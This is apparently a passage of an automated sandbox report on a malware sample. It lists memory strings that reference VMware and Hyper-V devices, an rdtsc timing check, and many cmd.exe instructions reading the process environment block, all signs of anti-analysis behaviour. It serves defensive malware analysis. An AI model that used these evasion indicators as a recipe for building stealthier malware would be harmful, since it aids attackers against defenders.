            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
            Source: Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
            Source: Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
            Source: explorer.exe, 00000007.00000000.318850727.0000000008290000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.374000446.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
            Source: explorer.exe, 00000007.00000000.281739270.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000007.00000000.360032038.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
            Source: explorer.exe, 00000007.00000000.355070759.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
            Source: Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
            Source: Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
            Source: Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.389287152.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: explorer.exe, 00000007.00000000.318303774.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
            Source: C:\Users\user\Desktop\TR0627729920002.exeCode function: 0_3_035D083E rdtsc 0_3_035D083E
            Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C553CA mov eax, dword ptr fs:[00000030h]5_2_03C553CA
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C553CA mov eax, dword ptr fs:[00000030h]5_2_03C553CA
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h]5_2_03C003E2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h]5_2_03C003E2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h]5_2_03C003E2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h]5_2_03C003E2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h]5_2_03C003E2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C003E2 mov eax, dword ptr fs:[00000030h]5_2_03C003E2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE1B8F mov eax, dword ptr fs:[00000030h]5_2_03BE1B8F
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE1B8F mov eax, dword ptr fs:[00000030h]5_2_03BE1B8F
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9138A mov eax, dword ptr fs:[00000030h]5_2_03C9138A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C8D380 mov ecx, dword ptr fs:[00000030h]5_2_03C8D380
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0B390 mov eax, dword ptr fs:[00000030h]5_2_03C0B390
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFDBE9 mov eax, dword ptr fs:[00000030h]5_2_03BFDBE9
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02397 mov eax, dword ptr fs:[00000030h]5_2_03C02397
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C04BAD mov eax, dword ptr fs:[00000030h]5_2_03C04BAD
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C04BAD mov eax, dword ptr fs:[00000030h]5_2_03C04BAD
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C04BAD mov eax, dword ptr fs:[00000030h]5_2_03C04BAD
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA5BA5 mov eax, dword ptr fs:[00000030h]5_2_03CA5BA5
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA8B58 mov eax, dword ptr fs:[00000030h]5_2_03CA8B58
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C03B7A mov eax, dword ptr fs:[00000030h]5_2_03C03B7A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C03B7A mov eax, dword ptr fs:[00000030h]5_2_03C03B7A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9131B mov eax, dword ptr fs:[00000030h]5_2_03C9131B
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDDB60 mov ecx, dword ptr fs:[00000030h]5_2_03BDDB60
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDF358 mov eax, dword ptr fs:[00000030h]5_2_03BDF358
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDDB40 mov eax, dword ptr fs:[00000030h]5_2_03BDDB40
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02ACB mov eax, dword ptr fs:[00000030h]5_2_03C02ACB
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEAAB0 mov eax, dword ptr fs:[00000030h]5_2_03BEAAB0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEAAB0 mov eax, dword ptr fs:[00000030h]5_2_03BEAAB0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD52A5 mov eax, dword ptr fs:[00000030h]5_2_03BD52A5
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD52A5 mov eax, dword ptr fs:[00000030h]5_2_03BD52A5
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD52A5 mov eax, dword ptr fs:[00000030h]5_2_03BD52A5
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD52A5 mov eax, dword ptr fs:[00000030h]5_2_03BD52A5
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD52A5 mov eax, dword ptr fs:[00000030h]5_2_03BD52A5
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02AE4 mov eax, dword ptr fs:[00000030h]5_2_03C02AE4
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0D294 mov eax, dword ptr fs:[00000030h]5_2_03C0D294
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0D294 mov eax, dword ptr fs:[00000030h]5_2_03C0D294
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0FAB0 mov eax, dword ptr fs:[00000030h]5_2_03C0FAB0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C64257 mov eax, dword ptr fs:[00000030h]5_2_03C64257
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9EA55 mov eax, dword ptr fs:[00000030h]5_2_03C9EA55
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF3A1C mov eax, dword ptr fs:[00000030h]5_2_03BF3A1C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C8B260 mov eax, dword ptr fs:[00000030h]5_2_03C8B260
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C8B260 mov eax, dword ptr fs:[00000030h]5_2_03C8B260
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA8A62 mov eax, dword ptr fs:[00000030h]5_2_03CA8A62
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDAA16 mov eax, dword ptr fs:[00000030h]5_2_03BDAA16
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDAA16 mov eax, dword ptr fs:[00000030h]5_2_03BDAA16
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD5210 mov eax, dword ptr fs:[00000030h]5_2_03BD5210
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD5210 mov ecx, dword ptr fs:[00000030h]5_2_03BD5210
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD5210 mov eax, dword ptr fs:[00000030h]5_2_03BD5210
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD5210 mov eax, dword ptr fs:[00000030h]5_2_03BD5210
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE8A0A mov eax, dword ptr fs:[00000030h]5_2_03BE8A0A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C1927A mov eax, dword ptr fs:[00000030h]5_2_03C1927A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9AA16 mov eax, dword ptr fs:[00000030h]5_2_03C9AA16
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9AA16 mov eax, dword ptr fs:[00000030h]5_2_03C9AA16
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C14A2C mov eax, dword ptr fs:[00000030h]5_2_03C14A2C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C14A2C mov eax, dword ptr fs:[00000030h]5_2_03C14A2C
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD9240 mov eax, dword ptr fs:[00000030h]5_2_03BD9240
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD9240 mov eax, dword ptr fs:[00000030h]5_2_03BD9240
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD9240 mov eax, dword ptr fs:[00000030h]5_2_03BD9240
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD9240 mov eax, dword ptr fs:[00000030h]5_2_03BD9240
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C641E8 mov eax, dword ptr fs:[00000030h]5_2_03C641E8
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFC182 mov eax, dword ptr fs:[00000030h]5_2_03BFC182
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0A185 mov eax, dword ptr fs:[00000030h]5_2_03C0A185
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C02990 mov eax, dword ptr fs:[00000030h]5_2_03C02990
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDB1E1 mov eax, dword ptr fs:[00000030h]5_2_03BDB1E1
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDB1E1 mov eax, dword ptr fs:[00000030h]5_2_03BDB1E1
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDB1E1 mov eax, dword ptr fs:[00000030h]5_2_03BDB1E1
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C061A0 mov eax, dword ptr fs:[00000030h]5_2_03C061A0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C061A0 mov eax, dword ptr fs:[00000030h]5_2_03C061A0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C569A6 mov eax, dword ptr fs:[00000030h]5_2_03C569A6
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C551BE mov eax, dword ptr fs:[00000030h]5_2_03C551BE
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C551BE mov eax, dword ptr fs:[00000030h]5_2_03C551BE
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C551BE mov eax, dword ptr fs:[00000030h]5_2_03C551BE
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C551BE mov eax, dword ptr fs:[00000030h]5_2_03C551BE
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF4120 mov eax, dword ptr fs:[00000030h]5_2_03BF4120
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF4120 mov eax, dword ptr fs:[00000030h]5_2_03BF4120
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF4120 mov eax, dword ptr fs:[00000030h]5_2_03BF4120
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF4120 mov eax, dword ptr fs:[00000030h]5_2_03BF4120
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF4120 mov ecx, dword ptr fs:[00000030h]5_2_03BF4120
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD9100 mov eax, dword ptr fs:[00000030h]5_2_03BD9100
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD9100 mov eax, dword ptr fs:[00000030h]5_2_03BD9100
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD9100 mov eax, dword ptr fs:[00000030h]5_2_03BD9100
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDB171 mov eax, dword ptr fs:[00000030h]5_2_03BDB171
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDB171 mov eax, dword ptr fs:[00000030h]5_2_03BDB171
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDC962 mov eax, dword ptr fs:[00000030h]5_2_03BDC962
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0513A mov eax, dword ptr fs:[00000030h]5_2_03C0513A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0513A mov eax, dword ptr fs:[00000030h]5_2_03C0513A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFB944 mov eax, dword ptr fs:[00000030h]5_2_03BFB944
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFB944 mov eax, dword ptr fs:[00000030h]5_2_03BFB944
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6B8D0 mov eax, dword ptr fs:[00000030h]5_2_03C6B8D0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6B8D0 mov ecx, dword ptr fs:[00000030h]5_2_03C6B8D0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6B8D0 mov eax, dword ptr fs:[00000030h]5_2_03C6B8D0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6B8D0 mov eax, dword ptr fs:[00000030h]5_2_03C6B8D0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6B8D0 mov eax, dword ptr fs:[00000030h]5_2_03C6B8D0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6B8D0 mov eax, dword ptr fs:[00000030h]5_2_03C6B8D0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD9080 mov eax, dword ptr fs:[00000030h]5_2_03BD9080
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C53884 mov eax, dword ptr fs:[00000030h]5_2_03C53884
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C53884 mov eax, dword ptr fs:[00000030h]5_2_03C53884
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD58EC mov eax, dword ptr fs:[00000030h]5_2_03BD58EC
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h]5_2_03C020A0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h]5_2_03C020A0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h]5_2_03C020A0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h]5_2_03C020A0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h]5_2_03C020A0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C020A0 mov eax, dword ptr fs:[00000030h]5_2_03C020A0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C190AF mov eax, dword ptr fs:[00000030h]5_2_03C190AF
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0F0BF mov ecx, dword ptr fs:[00000030h]5_2_03C0F0BF
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0F0BF mov eax, dword ptr fs:[00000030h]5_2_03C0F0BF
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0F0BF mov eax, dword ptr fs:[00000030h]5_2_03C0F0BF
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEB02A mov eax, dword ptr fs:[00000030h]5_2_03BEB02A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEB02A mov eax, dword ptr fs:[00000030h]5_2_03BEB02A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEB02A mov eax, dword ptr fs:[00000030h]5_2_03BEB02A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEB02A mov eax, dword ptr fs:[00000030h]5_2_03BEB02A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C92073 mov eax, dword ptr fs:[00000030h]5_2_03C92073
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA1074 mov eax, dword ptr fs:[00000030h]5_2_03CA1074
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C57016 mov eax, dword ptr fs:[00000030h]5_2_03C57016
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C57016 mov eax, dword ptr fs:[00000030h]5_2_03C57016
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C57016 mov eax, dword ptr fs:[00000030h]5_2_03C57016
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA4015 mov eax, dword ptr fs:[00000030h]5_2_03CA4015
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA4015 mov eax, dword ptr fs:[00000030h]5_2_03CA4015
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0002D mov eax, dword ptr fs:[00000030h]5_2_03C0002D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0002D mov eax, dword ptr fs:[00000030h]5_2_03C0002D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0002D mov eax, dword ptr fs:[00000030h]5_2_03C0002D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0002D mov eax, dword ptr fs:[00000030h]5_2_03C0002D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0002D mov eax, dword ptr fs:[00000030h]5_2_03C0002D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF0050 mov eax, dword ptr fs:[00000030h]5_2_03BF0050
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF0050 mov eax, dword ptr fs:[00000030h]5_2_03BF0050
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE8794 mov eax, dword ptr fs:[00000030h]5_2_03BE8794
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C137F5 mov eax, dword ptr fs:[00000030h]5_2_03C137F5
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C57794 mov eax, dword ptr fs:[00000030h]5_2_03C57794
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C57794 mov eax, dword ptr fs:[00000030h]5_2_03C57794
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C57794 mov eax, dword ptr fs:[00000030h]5_2_03C57794
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD4F2E mov eax, dword ptr fs:[00000030h]5_2_03BD4F2E
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BD4F2E mov eax, dword ptr fs:[00000030h]5_2_03BD4F2E
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA8F6A mov eax, dword ptr fs:[00000030h]5_2_03CA8F6A
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFF716 mov eax, dword ptr fs:[00000030h]5_2_03BFF716
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA070D mov eax, dword ptr fs:[00000030h]5_2_03CA070D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA070D mov eax, dword ptr fs:[00000030h]5_2_03CA070D
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0A70E mov eax, dword ptr fs:[00000030h]5_2_03C0A70E
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0A70E mov eax, dword ptr fs:[00000030h]5_2_03C0A70E
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6FF10 mov eax, dword ptr fs:[00000030h]5_2_03C6FF10
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6FF10 mov eax, dword ptr fs:[00000030h]5_2_03C6FF10
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEFF60 mov eax, dword ptr fs:[00000030h]5_2_03BEFF60
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0E730 mov eax, dword ptr fs:[00000030h]5_2_03C0E730
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BEEF40 mov eax, dword ptr fs:[00000030h]5_2_03BEEF40
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C18EC7 mov eax, dword ptr fs:[00000030h]5_2_03C18EC7
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C8FEC0 mov eax, dword ptr fs:[00000030h]5_2_03C8FEC0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C036CC mov eax, dword ptr fs:[00000030h]5_2_03C036CC
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA8ED6 mov eax, dword ptr fs:[00000030h]5_2_03CA8ED6
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C016E0 mov ecx, dword ptr fs:[00000030h]5_2_03C016E0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6FE87 mov eax, dword ptr fs:[00000030h]5_2_03C6FE87
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE76E2 mov eax, dword ptr fs:[00000030h]5_2_03BE76E2
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C546A7 mov eax, dword ptr fs:[00000030h]5_2_03C546A7
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA0EA5 mov eax, dword ptr fs:[00000030h]5_2_03CA0EA5
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA0EA5 mov eax, dword ptr fs:[00000030h]5_2_03CA0EA5
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA0EA5 mov eax, dword ptr fs:[00000030h]5_2_03CA0EA5
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9AE44 mov eax, dword ptr fs:[00000030h]5_2_03C9AE44
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9AE44 mov eax, dword ptr fs:[00000030h]5_2_03C9AE44
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDE620 mov eax, dword ptr fs:[00000030h]5_2_03BDE620
